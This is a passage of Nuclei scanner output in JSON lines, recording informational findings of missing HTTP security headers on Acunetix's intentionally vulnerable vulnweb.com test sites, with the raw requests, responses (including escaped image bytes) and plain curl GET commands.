ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:30.25525202Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:30.498424729Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:30.996595166Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 